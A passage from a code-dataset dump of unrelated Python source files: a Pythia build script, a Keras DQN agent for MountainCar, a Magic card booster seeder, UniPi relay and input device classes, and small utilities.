subfoldername=\"csvs\",\n pathname=\"./maggot_models/notebooks/outs\",\n save_on=True,\n):\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".csv\")\n with open(savename, \"w\") as f:\n wr = csv.writer(f)\n wr.writerows(lol)\n print(f\"Saved list of lists to {savename}\")\n\n\ndef readlol(\n name,\n foldername=None,\n subfoldername=\"csvs\",\n pathname=\"./maggot_models/notebooks/outs\",\n):\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".csv\")\n outer_list = []\n with open(savename, \"r\") as f:\n reader = csv.reader(f)\n for line in reader:\n outer_list.append([int(l) for l in line])\n return outer_list\n\n\ndef readcsv(\n name,\n foldername=None,\n subfoldername=\"csvs\",\n pathname=\"./maggot_models/notebooks/outs\",\n **kws,\n):\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".csv\")\n return pd.read_csv(savename, **kws)\n\n\ndef _write_walk_set(walk_set, f):\n for w in walk_set:\n str_walk = str(w)\n str_walk = str_walk.strip(\"[]\")\n str_walk = str_walk.replace(\"'\", \"\")\n str_walk = str_walk.replace(\",\", \"\")\n f.write(f\"{str_walk}\\n\")\n f.write(\"\\n\")\n\n\ndef save_walks(\n walks, name=\"walks.txt\", outpath=\".\", multidoc=False, shuffle_walks=True\n):\n outpath = Path(outpath)\n outfile = outpath / name\n if not multidoc:\n walks = [walks]\n with open(outfile, \"w\") as f:\n for walk_set in walks:\n if shuffle_walks:\n shuffle(walk_set)\n _write_walk_set(walk_set, f)\n print(f\"Saved walks to {outfile}\")\n","repo_name":"neurodata/maggot_models","sub_path":"src/io/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14834603463","text":"import argparse\nimport os\nimport shutil\nimport stat\nimport subprocess\nimport sys\nfrom datetime import datetime\n\nimport setuptools\nfrom pkg_resources import parse_version\n\nos.chdir(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\n\n# Python 3.7 workaround:\ndef parse_version_wrapper(txt):\n version = parse_version(txt)\n\n try:\n version.major # noqa\n version.minor # noqa\n except AttributeError:\n # Python 3.7 doesn't have these so we patch them in\n version.major = version._version.release[0]\n version.minor = version._version.release[1]\n\n return version\n\n\ndef _verbose_run(cmd, **kwargs):\n print(' '.join(c if ' ' not in c else f'\"{c}\"' for c in cmd), flush=True)\n subprocess.run(cmd, **kwargs)\n\n\ndef clear_pythia_directory():\n base = '@Pythia'\n print(f'Deleting {base} contents...')\n\n def del_rw(action, name, exc):\n \"\"\"Fix permissions in case of a read-only file\"\"\"\n os.chmod(name, stat.S_IWRITE)\n if os.path.isdir(name):\n os.rmdir(name)\n else:\n os.remove(name)\n\n os.makedirs(base, exist_ok=True)\n for filename in os.listdir('@Pythia'):\n path = os.path.join(base, filename)\n if os.path.isdir(path):\n shutil.rmtree(path, onerror=del_rw)\n else:\n os.unlink(path)\n\n\ndef create_interpreters(version, dest):\n version = parse_version_wrapper(version)\n print(f'Creating Python {version} interpreters in \"{dest}\" directory...', flush=True)\n subprocess.run([sys.executable, os.path.join('tools', 'create_embedded_python.py'), '--version', str(version), dest], check=True)\n\n\ndef _get_embed(version, system, arch):\n embed = {\n 'linux': {\n 'x86': os.path.join('@Pythia', f'python-{version.major}{version.minor}-embed-linux32', 'bin', 'python3'),\n 'x64': os.path.join('@Pythia', f'python-{version.major}{version.minor}-embed-linux64', 'bin', 'python3'),\n },\n 'windows': {\n 'x86': os.path.join('@Pythia', f'python-{version.major}{version.minor}-embed-win32', 'python.exe'),\n 'x64': os.path.join('@Pythia', f'python-{version.major}{version.minor}-embed-amd64', 'python.exe'),\n }\n }\n\n return embed[system][arch]\n\n\ndef build_binaries(version, arch, system, run_tests=True):\n version = parse_version_wrapper(version)\n print(f'Building {arch} binaries for {system}...', flush=True)\n\n if system == 'linux':\n env = None\n else:\n env = setuptools.msvc.msvc14_get_vc_env(arch)\n\n if os.path.exists('ninja'):\n shutil.rmtree('ninja')\n os.makedirs('ninja')\n\n if system == 'linux':\n platform = ['--platform', 'linux/386'] if arch == 'x86' else []\n _verbose_run(['docker', 'build', '-f', f'Dockerfile.{arch}'] + platform + ['-t', 'pythia:latest', '.'], check=True)\n # Workaround for GitHub Actions\n # This is to fix GIT not liking owner of the checkout dir (git callback in cmake)\n # https://github.com/actions/runner/issues/2033\n uid_gid = ['-u', f'{os.getuid()}:{os.getgid()}'] if sys.platform == 'linux' else []\n docker_prefix = ['docker', 'run'] + platform + uid_gid + ['--rm', '-v', f'{os.getcwd()}/:/data', '-w', '/data/ninja', 'pythia:latest']\n shell = False\n else:\n docker_prefix = []\n shell = True\n\n _verbose_run(docker_prefix + ['cmake', '-G', 'Ninja', f'-DUSE_64BIT_BUILD={\"ON\" if arch == \"x64\" else \"OFF\"}', '-DCMAKE_BUILD_TYPE=RelWithDebInfo', '..'], check=True, cwd='ninja', env=env, shell=shell)\n _verbose_run(docker_prefix + ['ninja'], check=True, cwd='ninja', env=env, shell=shell)\n\n\ndef run_tests(version, arch, system):\n version = parse_version_wrapper(version)\n print(f'Running tests for {arch} {system}...', flush=True)\n\n _verbose_run([_get_embed(version, system, arch), os.path.join('tests', 'tests.py')], check=True)\n\n\ndef build_pbos():\n print('Building PBOs...', flush=True)\n subprocess.run([sys.executable, os.path.join('tools', 'create_pbos.py')], check=True)\n\n\ndef copy_templates(version):\n version = parse_version_wrapper(version)\n print('Copying files to @Pythia folder...', flush=True)\n\n for f in os.listdir('templates'):\n with open(os.path.join('templates', f), 'rb') as fread:\n with open(os.path.join('@Pythia', f), 'wb') as fwrite:\n data = fread.read()\n data = data.replace(b'{version}', f'{version.major}{version.minor}'.encode('ascii'))\n # https://stackoverflow.com/a/15919878/6543759\n kind = (1 << 62) # UTC\n ticks = int((datetime.utcnow() - datetime(1, 1, 1)).total_seconds() * (10 ** 7))\n dotnet_timestamp = str(ticks | kind)\n data = data.replace(b'{dotnet_timestamp}', dotnet_timestamp.encode('ascii'))\n fwrite.write(data)\n\n\ndef safety_checks(version):\n version = parse_version_wrapper(version)\n print('Running safety checks...', flush=True)\n subprocess.run([sys.executable, os.path.join('tools', 'safety_checks.py'), str(version)], check=True)\n\n\ndef pack_mod():\n print('Packing the resulting mod to a tbz file...', flush=True)\n shutil.make_archive('@Pythia', 'bztar', root_dir='.', base_dir='@Pythia')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(required=True, dest='command')\n\n parser_create_interpreters = subparsers.add_parser('create_interpreters')\n parser_create_interpreters.add_argument('version')\n parser_create_interpreters.add_argument('--dest', default='@Pythia')\n parser_create_interpreters.set_defaults(func=create_interpreters)\n\n parser_copy_templates = subparsers.add_parser('copy_templates')\n parser_copy_templates.add_argument('version')\n parser_copy_templates.set_defaults(func=copy_templates)\n\n parser_build_binaries = subparsers.add_parser('build_binaries')\n parser_build_binaries.add_argument('version')\n parser_build_binaries.add_argument('arch', choices=['x86', 'x64'])\n parser_build_binaries.add_argument('system', choices=['windows', 'linux'], type=str.lower)\n parser_build_binaries.set_defaults(func=build_binaries)\n\n parser_run_tests = subparsers.add_parser('run_tests')\n parser_run_tests.add_argument('version')\n parser_run_tests.add_argument('arch', choices=['x86', 'x64'])\n parser_run_tests.add_argument('system', choices=['windows', 'linux'], type=str.lower)\n parser_run_tests.set_defaults(func=run_tests)\n\n parser_build_pbos = subparsers.add_parser('build_pbos')\n parser_build_pbos.set_defaults(func=build_pbos)\n\n parser_safety_checks = subparsers.add_parser('safety_checks')\n parser_safety_checks.add_argument('version')\n parser_safety_checks.set_defaults(func=safety_checks)\n\n parser_pack_mod = subparsers.add_parser('pack_mod')\n parser_pack_mod.set_defaults(func=pack_mod)\n\n parser_clear_pythia_directory = subparsers.add_parser('clear_pythia_directory')\n parser_clear_pythia_directory.set_defaults(func=clear_pythia_directory)\n\n args_vars = vars(parser.parse_args())\n\n # Python 3.7 required add_subparsers(dest='...') for when the command is\n # missing. So we need to pop it here so we don't pass it to functions\n del args_vars['command']\n\n func = args_vars.pop('func')\n func(**args_vars)\n","repo_name":"overfl0/Pythia","sub_path":"tools/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"40421046974","text":"import gym\nimport numpy as np\nimport random\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Dropout\nfrom keras.optimizers import Adam\n\nfrom collections import deque\n\n\nclass DQN:\n def __init__(self, env):\n self.env = env\n self.memory = deque(maxlen=2000)\n\n self.gamma = 0.85\n self.epsilon = 1.0\n self.epsilon_min = 0.01\n self.epsilon_decay = 0.995\n self.learning_rate = 0.005\n self.tau = .125\n\n self.model = self.create_model()\n self.target_model = self.create_model()\n\n def create_model(self):\n model = Sequential()\n state_shape = self.env.observation_space.shape\n model.add(Dense(24, input_dim=state_shape[0], activation=\"relu\"))\n model.add(Dense(48, activation=\"relu\"))\n model.add(Dense(24, activation=\"relu\"))\n model.add(Dense(self.env.action_space.n))\n model.compile(loss=\"mean_squared_error\",\n optimizer=Adam(lr=self.learning_rate))\n return model\n\n def act(self, state):\n self.epsilon *= self.epsilon_decay\n self.epsilon = max(self.epsilon_min, self.epsilon)\n if np.random.random() < self.epsilon:\n return self.env.action_space.sample()\n return np.argmax(self.model.predict(state)[0])\n\n def remember(self, state, action, reward, new_state, done):\n self.memory.append([state, action, reward, new_state, done])\n\n def replay(self):\n batch_size = 32\n if len(self.memory) < batch_size:\n return\n\n samples = random.sample(self.memory, batch_size)\n for sample in samples:\n state, action, reward, new_state, done = sample\n target = self.target_model.predict(state)\n if done:\n target[0][action] = reward\n else:\n Q_future = max(self.target_model.predict(new_state)[0])\n target[0][action] = reward + Q_future * self.gamma\n self.model.fit(state, target, epochs=1, verbose=0)\n\n def target_train(self):\n weights = self.model.get_weights()\n target_weights = self.target_model.get_weights()\n for i in range(len(target_weights)):\n target_weights[i] = weights[i] * self.tau + target_weights[i] * (1 - self.tau)\n self.target_model.set_weights(target_weights)\n\n def save_model(self, fn):\n self.model.save(fn)\n self.target_model.save(\"target_\"+fn)\n\n def load_model(self, fn):\n self.model = load_model(fn)\n\n\ndef main():\n env = gym.make(\"MountainCar-v0\")\n gamma = 0.9\n epsilon = .95\n\n trials = 1000\n trial_len = 500\n\n # updateTargetNetwork = 1000\n dqn_agent = DQN(env=env)\n steps = []\n for trial in range(trials):\n cur_state = env.reset().reshape(1, 2)\n step = 0\n for step in range(trial_len):\n action = dqn_agent.act(cur_state)\n new_state, reward, done, _ = env.step(action)\n\n # reward = reward if not done else -20\n new_state = new_state.reshape(1, 2)\n dqn_agent.remember(cur_state, action, reward, new_state, done)\n\n dqn_agent.replay() # internally iterates default (prediction) model\n dqn_agent.target_train() # iterates target model\n\n cur_state = new_state\n if done:\n break\n if step >= 199:\n print(\"Failed to complete in trial {}\".format(trial))\n if step % 10 == 0:\n dqn_agent.save_model(\"trial-{}.model\".format(trial))\n else:\n print(\"Completed in {} trials\".format(trial))\n dqn_agent.save_model(\"success.model\")\n break\n\n\ndef act(model, state):\n return np.argmax(model.predict(state)[0])\n\n\ndef run_model(filename):\n env = gym.make(\"MountainCar-v0\")\n model = load_model(filename)\n print(f\"model summary: {model.summary()}\")\n\n # trials = 10\n # trial_len = 500\n #\n # # updateTargetNetwork = 1000\n # dqn_agent = DQN(env=env)\n # steps = []\n #\n # env.render()\n # for trial in range(trials):\n # cur_state = env.reset().reshape(1, 2)\n # for step in range(trial_len):\n # action = dqn_agent.act(cur_state)\n # new_state, reward, done, _ = env.step(action)\n #\n # # reward = reward if not done else -20\n # new_state = new_state.reshape(1, 2)\n # dqn_agent.remember(cur_state, action, reward, new_state, done)\n #\n # dqn_agent.replay() # internally iterates default (prediction) model\n # dqn_agent.target_train() # iterates target model\n #\n # cur_state = new_state\n # if done:\n # break\n # if step >= 199:\n # print(\"Failed to complete in trial {}\".format(trial))\n # if step % 10 == 0:\n # dqn_agent.save_model(\"trial-{}.model\".format(trial))\n # else:\n # print(\"Completed in {} trials\".format(trial))\n # dqn_agent.save_model(\"success.model\")\n # break\n\n \"\"\"Evaluate agent's performance after Q-learning\"\"\"\n\n total_epochs, total_penalties = 0, 0\n episodes = 100\n\n for _ in range(episodes):\n print(f\"episode: {_}\")\n state = env.reset().reshape(1, 2)\n epochs, penalties, reward = 0, 0, 0\n\n done = False\n\n while not done:\n env.render()\n action = act(model, state)\n state, reward, done, info = env.step(action)\n state = state.reshape(1, 2)\n # print(state, reward, done, info)\n\n if reward == -1:\n penalties += 1\n\n epochs += 1\n\n total_penalties += penalties\n total_epochs += epochs\n\n print(f\"Results after {episodes} episodes:\")\n print(f\"Average timesteps per episode: {total_epochs / episodes}\")\n print(f\"Average penalties per episode: {total_penalties / episodes}\")\n\n\nif __name__ == \"__main__\":\n # main()\n run_model(\"target_success.model\")\n","repo_name":"TrellixVulnTeam/concepts_YVTE","sub_path":"src/DeepRL/mountain_car_2.py","file_name":"mountain_car_2.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72111944167","text":"from pyfiglet import Figlet\nfrom datetime import datetime\nimport os, time\n\ndef main():\n \n f = Figlet(font='big')\n \n\n def clear_screen(n):\n \n clear = lambda: os.system(\"cls\")\n time.sleep(n)\n clear()\n \n\n def display_clock():\n \n while True:\n try:\n today = datetime.today()\n clock = today.strftime('%I : %M : %S %p')\n print(f.renderText(clock))\n clear_screen(1)\n \n except KeyboardInterrupt as e:\n print(f\"CTRL_C로 중단 되었습니다. {e}\")\n break\n \n clear_screen(0)\n display_clock() \n \n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"coolho1129/Interactive-Programming","sub_path":"김찬호_2021114818(06).py","file_name":"김찬호_2021114818(06).py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30134494979","text":"from .models import *\nfrom .card import Card\n\nclass Set():\n #methods\n @staticmethod\n def get_sets(params):\n sets = select_items('sets', params)\n return sets\n\n @staticmethod\n def get_set_by_id(id):\n set = select_item_by_id('sets', id)\n return set\n\n @staticmethod\n def get_set_by_code(code):\n set = select_first_item('sets', [\"sets.code='%s'\" % code])\n return set\n\n @staticmethod\n def create_set(name, code, booster, release_date, card_count):\n set = insert_item('sets', {'name': name, 'code': code, 'booster': booster, 'release_date': release_date, 'card_count': card_count})\n return set\n\n @staticmethod\n def delete_set(id):\n set = delete_item_with_id('sets', \"id='%i'\" % id)\n return true\n\n @staticmethod\n def booster_rarities(booster):\n clean_booster = []\n for rarity in booster:\n if isinstance(rarity, list):\n if \"rare\" in rarity and \"mythic rare\" in rarity:\n rarity = [\"rare\"] * 7\n rarity.extend([\"mythic rare\"])\n elif \"foil mythic rare\" in rarity and \"foil rare\" in rarity and \"foil uncommon\" in rarity and \"foil common\" in rarity:\n rarity = [\"common\"] * 18\n rarity.extend([\"uncommon\"] * 12)\n rarity.extend([\"rare\"] * 5)\n rarity.append(\"mythic rare\")\n rarity = re.sub(\"foil\\s\", \"\", random.choice(rarity))\n elif rarity == \"land\":\n rarity = \"basic land\"\n if rarity != \"marketing\":\n clean_booster.append(rarity)\n return clean_booster\n\n @staticmethod\n def generate_booster(set_code):\n set_code = set_code.upper()\n set = Set.get_set_by_code(set_code)\n booster = Set.booster_rarities(set['booster'])\n cards = []\n for rarity in booster:\n card_ids_used = [card['id'] if card and 'id' in card else 0 for card in cards]\n card = Card.get_random_card([\"cards.set_code='%s'\" % set_code, \"cards.rarity='%s'\" % rarity, \"cards.number <= %i\" % set['card_count'], \"cards.id not in (%s)\" % \",\".join(list(map(str, card_ids_used)))])\n cards.append(card)\n return cards\n\n @staticmethod\n def seed_data(reseed=False):\n with open('AllSets.json') as sets_file:\n set_data = json.load(sets_file)\n Set.seed_sets(set_data, reseed)\n sets = Set.get_sets([])\n return sets\n\n @staticmethod\n def seed_sets(set_data, reseed=False):\n included_sets = [\"MM3\", \"AKH\", \"HOU\", \"XLN\", \"IMA\", \"RIX\", \"A25\", \"DOM\"]\n for set_code, set in set_data.items():\n existing_sets = Set.get_sets([\"code='%s'\" % set_code])\n if set['code'] in included_sets:\n if not existing_sets:\n new_set = Set.create_set(set['name'], set_code, json.dumps(set['booster']), set['releaseDate'], len(set['cards']))\n if not existing_sets or reseed:\n Set.seed_cards(set['code'], set['cards'])\n\n # @staticmethod\n # def seed_lands(set_data):\n # included_sets = [\"ZEN\", \"UNH\", \"UGL\", \"LEA\", \"\"]\n # zen_full_arts = [195179, 201972, 201974, 195163, 201966, 201964, 201963, 195170, 201977, 201978, 195159, 195157, 201968, 201969, 201970, 201967, 195158, 201962, 201960, 195183]\n # unh_full_arts = []\n # ugl_full_arts = []\n # land_ids = []\n # for set_code, set in set_data.items():\n # if set['code'] in included_sets:\n # lands = [card for card in set['cards'] if card['id'] in land_ids]\n # Set.seed_cards(set['code'], lands)\n\n @staticmethod\n def seed_cards(set_code, card_data):\n for card in card_data:\n existing_cards = Card.get_cards([\"multiverse_id=%s\" % card['multiverseid']])\n colors = json.dumps(card['colors']) if 'colors' in card else '[]'\n mana_cost = card['manaCost'] if 'manaCost' in card else ''\n number = int(re.sub(\"[^0-9]\", \"\", card['number']))\n if not existing_cards:\n new_card = Card.create_card(card['name'], card['multiverseid'], card['cmc'], colors, set_code, mana_cost, json.dumps(card['types']), card['rarity'].lower(), number)\n elif not existing_cards[0]['colors'] or not existing_cards[0]['types'] or not existing_cards[0]['rarity'] or not existing_cards[0]['number']:\n update_card = update_item('cards', [\"colors='%s'\" % colors, \"types='%s'\" % json.dumps(card['types']), \"rarity='%s'\" % card['rarity'].lower(), \"number=%i\" % number], params=[\"id=%i\" % existing_cards[0]['id']])\n","repo_name":"thomascmurphy/draft","sub_path":"flask_backend/app/models/set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42353739282","text":"def tabla_multiplicar():\n resultado = \"\"\n for multiplicando in range(1, 11):\n resultado += f\"Tabla de multiplicar del {multiplicando}:\\n\"\n \n for multiplicador in range(1, 11):\n resultadomult = multiplicando * multiplicador\n resultado += f\"{multiplicando} x {multiplicador} = {resultadomult}\\n\"\n resultado += \"\\n\"\n return resultado\n\ndef main():\n print(tabla_multiplicar())\n\nif __name__ == \"__main__\":\n main()","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-alcinacarlos","sub_path":"src/ej22_07.py","file_name":"ej22_07.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"400789801","text":"\"\"\"Customizable colors used in the Shell\n\"\"\"\n\nfrom colorama import Fore, Back, Style\n\n\n# Help Command Colors\n\nHELP_USAGE_STYLE = Style.BRIGHT\nHELP_USAGE_FORE = Fore.GREEN\n\nHELP_TEXT_FORE = Style.DIM\n\nHELP_OPTION_DESCRIPTION_STYLE = Style.DIM\nHELP_OPTION_NAME_STYLE = Fore.YELLOW\nHELP_OPTION_HEADER_FORE = Fore.WHITE\nHELP_OPTION_HEADER_BACK = Back.MAGENTA\nHELP_OPTION_HEADER_STYLE = Style.BRIGHT\n\nHELP_ARGUMENT_DESCRIPTION_STYLE = Style.DIM\nHELP_ARGUMENT_NAME_STYLE = Fore.YELLOW + Style.BRIGHT\nHELP_ARGUMENT_CLASS_STYLE = Fore.CYAN\nHELP_ARGUMENT_ARROW_STYLE = Fore.RED + Style.BRIGHT\nHELP_ARGUMENT_HEADER_FORE = Fore.BLUE + Style.DIM\nHELP_ARGUMENT_HEADER_BACK = Back.LIGHTYELLOW_EX\nHELP_ARGUMENT_HEADER_STYLE = Style.NORMAL\n\nHELP_COMMAND_DESCRIPTION_STYLE = Style.DIM\nHELP_COMMAND_NAME_STYLE = Fore.YELLOW\nHELP_COMMAND_HEADER_FORE = Fore.WHITE\nHELP_COMMAND_HEADER_BACK = Back.BLUE\nHELP_COMMAND_HEADER_STYLE = Style.BRIGHT\n\nHELP_ALIASES_ALIAS_STYLE = Fore.WHITE + Style.DIM\nHELP_ALIASES_HEADER_FORE = Fore.WHITE\nHELP_ALIASES_HEADER_BACK = Back.CYAN\nHELP_ALIASES_HEADER_STYLE = Style.BRIGHT\n\n\n# Exception Colors\n\nUSAGE_ERROR_STYLE = Fore.RED + Style.BRIGHT\n\nCLICK_ERROR_STYLE = Fore.RED + Style.BRIGHT\n\nUNEXPECTED_ERROR_TEXT_STYLE = Fore.YELLOW\n\nPYTHON_ERROR_HEADER_FORE = Fore.WHITE\nPYTHON_ERROR_HEADER_BACK = Back.LIGHTRED_EX\nPYTHON_ERROR_HEADER_STYLE = Style.BRIGHT\nPYTHON_STACKTRACE_STYLE = Style.DIM\n\n\n# CMD Colors\n\nCOMMAND_NOT_FOUND_TEXT_STYLE = Style.DIM\nCOMMAND_NOT_FOUND_TEXT_FORE = Fore.YELLOW\n\nSUGGEST_TEXT_STYLE = Style.BRIGHT\nSUGGEST_TEXT_COLOR = Fore.CYAN\nSUGGEST_ITEMS_STYLE = Fore.YELLOW\n\nPROMPT_DEFAULT_TEXT = \"#ffffff\" #00ffff\nPROMPT_NAME = \"#009999\"\nPROMPT_SYMBOL = \"#999966\"\n\n\n# Completion Colors\n\nCOMPLETION_COMMAND_NAME = 'ansiblue'\nCOMPLETION_COMMAND_DESCRIPTION = 'fg=\\\"#5f00d7\\\"'\nCOMPLETION_ROOT_COMMAND_NAME = 'ansiblue'\nCOMPLETION_ROOT_COMMAND_DESCRIPTION = 'fg=\\\"#5f00d7\\\"'\n\nCOMPLETION_CHOICE_DEFAULT = 'ansiblack'\nCOMPLETION_CHOICE_BOOLEAN_TRUE = 'ansigreen'\nCOMPLETION_CHOICE_BOOLEAN_FALSE = 'style fg=\\\"#dc322f\\\"'\n\nCOMPLETION_OPTION_NAME = 'ansibrightmagenta'\nCOMPLETION_OPTION_DESCRIPTION = 'fg=\\\"#5f00d7\\\"'\n\nCOMPLETION_ARGUMENT_NAME = 'ansired'\nCOMPLETION_ARGUMENT_DESCRIPTION = 'fg=\\\"#5f00d7\\\"'\n\nCOMPLETION_LITERAL_TUPLE_TYPE = 'fg=\\\"#000087\\\"'\nCOMPLETION_LITERAL_TUPLE_TYPE_USED = 'fg=\\\"#5f0000\\\"'\nCOMPLETION_LITERAL_TUPLE_TYPE_CURRENT = 'fg=\\\"#5f00af\\\"'\n\n\n# Base Shell Command Colors\n\nSHELL_HISTORY_CLEARED_STYLE = Style.DIM\nSHELL_HISTORY_CLEARED_TRUE = Fore.GREEN\nSHELL_HISTORY_CLEARED_FALSE = Fore.RED + Style.BRIGHT\n\n\n# Lexer Colors\n\nPYGMENTS_NAME_HELP = '#afd700'\nPYGMENTS_NAME_EXIT = '#ff005f'\nPYGMENTS_NAME_SYMBOL = '#5faf87'\n\nPYGMENTS_NAME_SHELL = '#5faf00'\nPYGMENTS_NAME_COMMAND = '#afaf87'\nPYGMENTS_NAME_SUBCOMMAND = '#5f5fff'\nPYGMENTS_NAME_INVALIDCOMMAND = '#ff0000'\n\nPYGMENTS_OPTION = '#d75f5f'\n\nPYGMENTS_OPERATOR = '#ffaf00'\nPYGMENTS_KEYWORD = '#af0087'\n\nPYGMENTS_LITERAL_NUMBER = '#ffff5f'\nPYGMENTS_LITERAL_STRING = '#8a380f'\nPYGMENTS_LITERAL_STRING_LITERAL = '#1fad91'\n\nPYGMENTS_PARAMETER_CHOICE = '#3385ff'\n\n\n# Shell Prompt Style\n\ntry:\n from prompt_toolkit.styles import Style\n\n prompt_style = Style.from_dict({\n '': PROMPT_DEFAULT_TEXT,\n\n 'name': PROMPT_NAME,\n 'prompt': PROMPT_SYMBOL,\n\n 'pygments.text': PROMPT_DEFAULT_TEXT,\n 'pygments.name.help': PYGMENTS_NAME_HELP,\n 'pygments.name.exit': PYGMENTS_NAME_EXIT,\n 'pygments.name.symbol': PYGMENTS_NAME_SYMBOL,\n\n 'pygments.name.label': PYGMENTS_NAME_SHELL,\n\n 'pygments.name.invalidcommand': PYGMENTS_NAME_INVALIDCOMMAND,\n 'pygments.name.command': PYGMENTS_NAME_COMMAND,\n 'pygments.name.subcommand': PYGMENTS_NAME_SUBCOMMAND,\n\n 'pygments.name.attribute': PYGMENTS_PARAMETER_CHOICE,\n\n 'pygments.name.tag': PYGMENTS_OPTION,\n\n 'pygments.operator': PYGMENTS_OPERATOR,\n 'pygments.keyword': PYGMENTS_KEYWORD,\n\n 'pygments.literal.number': PYGMENTS_LITERAL_NUMBER,\n\n 'pygments.literal.string': PYGMENTS_LITERAL_STRING,\n 'pygments.literal.string.symbol': PYGMENTS_LITERAL_STRING_LITERAL\n })\nexcept: pass","repo_name":"xSlither/pretty-click-shell","sub_path":"pcshell/_colors.py","file_name":"_colors.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"44770914058","text":"'''\n UniPi2 primitive devices (DI, DO, AI, AO)\n------------------------------------------\n'''\n\nimport struct\nimport time\nimport datetime\n#import atexit\nfrom math import isnan, floor\n\nfrom tornado import gen\nfrom tornado.ioloop import IOLoop\nimport devents\nfrom devices import *\nimport config\nfrom spiarm import ProxyRegister\n\nclass Relay(object):\n pending_id = 0\n\n def __init__(self, circuit, arm, coil, reg, mask):\n self.circuit = circuit\n self.arm = arm\n self.coil = coil\n self.bitmask = mask\n self.reg = arm.get_proxy_register(reg)\n self.reg.devices.add(self)\n #arm.register_relay(self)\n\n def full(self):\n return {'dev': 'relay', 'circuit': self.circuit, 'value': self.value, 'pending': self.pending_id != 0}\n\n def simple(self):\n return {'dev': 'relay', 'circuit': self.circuit, 'value': self.value}\n\n @property\n def value(self):\n try:\n if self.reg.value & self.bitmask: return 1\n except:\n pass\n return 0\n\n def get_state(self):\n \"\"\" Returns ( status, is_pending )\n current on/off status is taken from last mcp value without reading it from hardware\n is_pending is Boolean\n \"\"\"\n return (self.value, self.pending_id != 0)\n\n @gen.coroutine\n def set_state(self, value):\n \"\"\" Sets new on/off status. Disable pending timeouts\n \"\"\"\n if self.pending_id:\n IOLoop.instance().remove_timeout(self.pending_id)\n self.pending_id = None\n #yield self.mcp.set_masked_value(self._mask, value)\n raise gen.Return(1 if self.reg.value & self.bitmask else 0)\n\n def set(self, value=None, timeout=None):\n \"\"\" Sets new on/off status. Disable pending timeouts\n \"\"\"\n if value is None:\n raise Exception('Value must be specified')\n value = int(value)\n if not (timeout is None):\n timeout = float(timeout)\n\n #yield self.mcp.set_masked_value(self._mask, value)\n self.arm.write_bit(self.coil, 1 if value else 0)\n\n if timeout is None:\n return (1 if self.reg.value & self.bitmask else 0)\n\n def timercallback():\n self.pending_id = None\n self.arm.write_bit(self.coil, 0 if value else 1)\n\n self.pending_id = IOLoop.instance().add_timeout(\n datetime.timedelta(seconds=float(timeout)), timercallback)\n return (1 if value else 0)\n #return (1 if self.mcp.value & self._mask else 0)\n\n\nclass Input():\n def __init__(self, circuit, arm, reg, mask, regcounter=None, regdebounce=None):\n self.circuit = circuit\n self.arm = arm\n self.bitmask = mask\n self.reg = arm.get_proxy_register(reg)\n self.regcounter1 = None if regcounter is None else arm.get_proxy_register(regcounter) \n self.regcounter2 = None if regcounter is None else arm.get_proxy_register(regcounter+1) \n self.regdebounce = None if regdebounce is None else arm.get_proxy_register(regdebounce)\n self.reg.devices.add(self)\n self.regcounter1.devices.add(self)\n self.regcounter2.devices.add(self)\n self.regdebounce.devices.add(self)\n #self.counter_mode = \"rising\"\n self.counter_mode = \"disabled\"\n #if counter_mode in [\"rising\", \"falling\", \"disabled\"]:\n # self.value = 0\n # self.counter_mode = counter_mode\n #else:\n # self.counter_mode = 'disabled'\n # print 'DI%s: counter_mode must be one of: rising, falling or disabled. Counting is disabled!' % self.circuit\n\n @property\n def debounce(self):\n try: return self.regdebounce.value\n except: pass\n return 0\n\n @property\n def value(self):\n if self.counter_mode: return self.counter\n try:\n if self.reg & self.bitmask: return 1\n except:\n pass\n return 0\n\n @property\n def counter(self):\n try:\n r1 = self.regcounter1.value\n r2 = self.regcounter2.value\n return r1 + 0x10000*r2\n except:\n return 0\n\n def full(self):\n return {'dev': 'input', 'circuit': self.circuit, 'value': self.value,\n 'debounce': self.debounce, 'counter_mode':'self.counter_mode',\n 'counter': self.counter }\n\n def simple(self):\n return {'dev': 'input', 'circuit': self.circuit, 'value': self.value }\n\n def set(self, debounce=None, counter=None):\n if not (debounce is None):\n if not(self._regdebounce is None):\n self.arm.write_regs(self.regdebounce.regnum,debounce)\n #devents.config(self)\n if not (counter is None):\n if not(self._regcounter is None):\n self.arm.write_regs(self.regcounter.regnum,(0,0))\n #devents.status(self)\n\n def get(self):\n \"\"\" Returns ( value, debounce )\n current on/off value is taken from last value without reading it from hardware\n \"\"\"\n return (self.value, self.debounce)\n\n def get_value(self):\n \"\"\" Returns value\n current on/off value is taken from last value without reading it from hardware\n \"\"\"\n return self.value\n\n\nclass AnalogOutput():\n\n def __init__(self, circuit, arm, reg):\n self.circuit = circuit\n self.reg = arm.get_proxy_register(reg)\n self.reg.devices.add(self)\n self.factor = 10.50 / 4095\n self.arm = arm\n\n @property\n def value(self):\n try:\n return self.reg.value * self.factor # 3.558*3\n except:\n return 0\n\n def full(self):\n return {'dev': 'ao', 'circuit': self.circuit, 'value': self.value}\n\n def simple(self):\n return {'dev': 'ao', 